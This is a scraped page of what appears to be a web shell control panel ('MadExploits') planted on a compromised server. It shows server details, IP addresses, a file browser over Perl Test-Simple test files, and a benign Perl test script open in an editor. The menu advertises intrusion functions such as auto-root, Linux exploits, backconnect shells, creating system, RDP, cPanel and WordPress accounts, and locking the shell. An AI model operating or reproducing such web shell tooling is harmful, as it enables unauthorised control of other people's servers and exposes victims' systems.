Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.28
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-Test-Simple /
t /
Legacy /
Tester /
[ HOME SHELL ]
Name
Size
Permission
Action
tbt_01basic.t
1.24
KB
-rw-r--r--
tbt_02fhrestore.t
1.17
KB
-rw-r--r--
tbt_03die.t
225
B
-rw-r--r--
tbt_04line_num.t
196
B
-rw-r--r--
tbt_05faildiag.t
824
B
-rw-r--r--
tbt_06errormess.t
3.02
KB
-rw-r--r--
tbt_07args.t
5.15
KB
-rw-r--r--
tbt_08subtest.t
268
B
-rw-r--r--
tbt_09do.t
582
B
-rw-r--r--
tbt_09do_script.pl
215
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tbt_09do.t
#!/usr/bin/perl use strict; use warnings; use Test::Builder::Tester tests => 3; use Test::More; use File::Basename qw(dirname); use File::Spec qw(); my $file = File::Spec->join(dirname(__FILE__), 'tbt_09do_script.pl'); $file = File::Spec->catfile(File::Spec->curdir(), $file) unless File::Spec->file_name_is_absolute($file); my $done = do $file; ok(defined($done), 'do succeeded') or do { if ($@) { diag qq( \$@ is '$@'\n); } elsif ($!) { diag qq( \$! is '$!'\n); } else { diag qq( file's last statement returned undef: $file) } };
Close